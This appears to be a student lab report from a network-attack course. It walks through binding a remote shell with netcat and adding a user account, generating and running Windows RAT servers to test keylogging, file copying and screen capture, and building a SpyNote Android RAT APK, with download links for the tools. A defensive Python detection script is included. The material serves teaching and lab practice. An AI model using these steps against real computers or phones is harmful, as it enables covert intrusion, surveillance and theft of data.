Experiment 4 - malicious code technology

Student number: 201721430024

 

Chinese People's Public Security University


 

Network Warfare Technology

experimental report

 

Experiment 4

Malicious code technology

 

 

 

Student name: Wang Runtian

Grade: 2017

District team: Experimental class

Mentor: Your opinion

 

 

Information and Network Security Technology College

November 7, 2016

 

Overall experimental task

2016-2017 academic year, first semester

First, the purpose of the experiment

1. Through hands-on practice with Trojans, understand and master how Trojans spread and how they operate; by manually deleting a Trojan, learn the skills of checking for and removing Trojans, learn Trojan defense-related knowledge, and strengthen security awareness regarding Trojans.

2. Understand and become familiar with common network attack tools and the basic functions of Trojans.

3. Consolidate course knowledge and apply it in practice.

Second, the experimental requirements

1. Carefully read the contents of each experiment. Where a task requires screenshots, the screenshots must be clear and must be annotated and explained.

2. Documents must have a clear structure, accurate text and figures, and properly formatted labels. Reasoning must be objective, reasonable and logical.

3. Available software tools include NC, MSF and so on.

4. After the experiment, retain the electronic documents.

Third, experimental procedures

1. Preparation

Prepare for the experiment well in advance. Before the experiment, study its purpose, requirements and content in detail, become familiar with and set up the software tools to be used, and prepare the experimental content ahead of time as required.

2. Lab environment

Describe the hardware and software environment used in the experiment (including the various software tools).

Boot the machine and start Office 2003 or 2007, a browser, and the encryption and decryption software.

3. Experiment procedure

1) Start the system and start the tool environment.

2) Carry out the experimental content using the software tools.

4. Experimental report

Write the lab report in accordance with the standard lab report format. Embed the document in the lab report template and write it in the prescribed format; tables must have table captions and figures must have figure captions.

Task one: controlling a computer with NC

NetCat is known as the "Swiss Army knife" of networking: it is small, lean and powerful. It is called small and lean because the software has now been compressed to a size of only a dozen or so KB, with no reduction in functionality.

The experiment requires two students working together:

   

Step one:

On the victim's machine (student A), enter the following command:
  nc.exe -l -p port -e cmd.exe    // enters listening mode

   


Step two:

On the attacker's machine (student B), enter the following command:
  nc ip port    // connects to victim_IP and then obtains a shell. (Screenshot required)

 

 

   

   

Step three:

In the shell, use net user username password /add to add a user, then use the net user command on the victim's machine to verify it. (Screenshot required)

You can continue to carry out further operations through the command line.
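Seen from the defender's side, steps one to three leave a recognisable trail in process-creation logs: a netcat process started with both listen and execute options, a shell beneath it, and an account-creation command beneath that. The following detection sketch is an added example, not part of the original report; the event records, field names, PIDs, port 4444 and the account name are constructed sample values modelled on Sysmon-style process-creation events.

```python
import re

# Constructed process-creation records (fields modelled on Sysmon Event ID 1),
# ordered by creation time. Paths, PIDs, port and account name are sample values.
EVENTS = [
    {"pid": 400, "ppid": 100, "cmd": r"C:\Windows\explorer.exe"},
    {"pid": 812, "ppid": 400, "cmd": "nc.exe -l -p 4444 -e cmd.exe"},
    {"pid": 900, "ppid": 812, "cmd": "cmd.exe"},
    {"pid": 901, "ppid": 900, "cmd": "net user labuser Passw0rd! /add"},
    {"pid": 950, "ppid": 400, "cmd": "cmd.exe"},
    {"pid": 951, "ppid": 950, "cmd": "net user"},
]

NETCAT_IMAGE = re.compile(r"(^|[\\/])(nc|ncat|netcat)(\.exe)?$", re.I)
NET_USER_ADD = re.compile(r"(^|[\\/])net1?(\.exe)?\s+user\s.*/add\b", re.I)


def is_exec_listener(cmd):
    """True for a netcat command line that listens (-l/-L) and binds a program (-e)."""
    args = cmd.split()  # simplification: image paths containing spaces are not handled
    if not args or not NETCAT_IMAGE.search(args[0]):
        return False
    # Collect short-option letters so clustered forms such as -lvp are covered.
    letters = set("".join(a[1:] for a in args[1:]
                          if a.startswith("-") and not a.startswith("--")))
    return bool(letters & {"l", "L"}) and "e" in letters


def detect(events):
    """Return (rule, pid) alerts for exec listeners and account creation beneath them."""
    alerts, tainted = [], set()  # tainted: PIDs descended from an exec listener
    for ev in events:
        if is_exec_listener(ev["cmd"]):
            tainted.add(ev["pid"])
            alerts.append(("netcat-exec-listener", ev["pid"]))
        elif ev["ppid"] in tainted:
            tainted.add(ev["pid"])  # the shell and its children inherit the taint
            if NET_USER_ADD.search(ev["cmd"]):
                alerts.append(("account-added-under-listener", ev["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"ALERT {rule} pid={pid}")
```

Matching on the image name misses a renamed binary, so in practice this rule is paired with network telemetry showing which process owns the listening socket.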

   

Task two: controlling a computer with a Trojan

Tools:

https://pan.baidu.com/s/1ipOkdU2HTPFtgU6fF669Gg

The experiment requires two students working together:

Step one:

On the attacker's machine (student A), open the V2014.exe program or the Star RAT; the two Trojans have similar functionality.

   

   


Step two:

Click "Service generation" in the menu bar. In the server configuration dialog that pops up, configure the callback IP address (the attacker's IP) and port number, then click the "Generate" button to generate the Trojan server.

 

   

   

   

Step three:

Copy the generated Trojan executable to the victim's machine and double-click it to run.

Step four:

On the control terminal, check that the Trojan has come online, then test each of the following functions and take a screenshot of each.

 

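  1. File management: try to copy files

  2. Screen control: try to capture the desktop

  3. Keylogging: try to obtain the other party's keystroke records

  4. Session management: restart the other party's machine and check whether the Trojan starts automatically and comes back online

Session management: uninstall the Trojan from the other party's machine.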

 

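Task three: Android remote control practice (take screenshots of the whole process and write it up as a blog post)

Related tool downloads:

spynote and environment tools:

https://pan.baidu.com/s/1Olo9znpzADXMYDfi_rnjOg

Android emulators:

https://www.yeshen.com/

http://mumu.163.com/

Experimental steps:

Step one: The attacker opens the spynote software, which requires the .NET Framework 4.0 and JDK environments to be installed first.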

   

 

   

   

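Step two: Configure and open the listening port

Click Listen Port, enter the port number in the dialog box that pops up, click the Add button, and finally click OK; the local port is now being listened on. [This walkthrough uses port 3210; you may choose your own port for the experiment.]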

   

 

   

   

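Step three: Configure and generate the Trojan

(1) Click the Build Client button; a dialog box pops up.

(2) Configure the callback IP and port. For the IP address, enter the IP of the machine running spynote; for the port, enter the listening port number, which is 3210 in this walkthrough.

(3) Configure the related attribute information.

(4) Finally, click the Build button and, in the selection dialog, select Patch-release.apk, which is in the same folder as spynote.

(5) When the build completes, the folder containing the generated APK opens automatically.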

   

   

 

   

Step four: Install the Trojan in the Android emulator.

   

 

 

   

   

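Step five: Control the phone from Spynote

In spynote you can see that one device has come online, and you can view its basic information.

Right-click the device to see the functions available for controlling it; choose at least four of them to experiment with.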

  


Origin www.cnblogs.com/p201721430024/p/12010172.html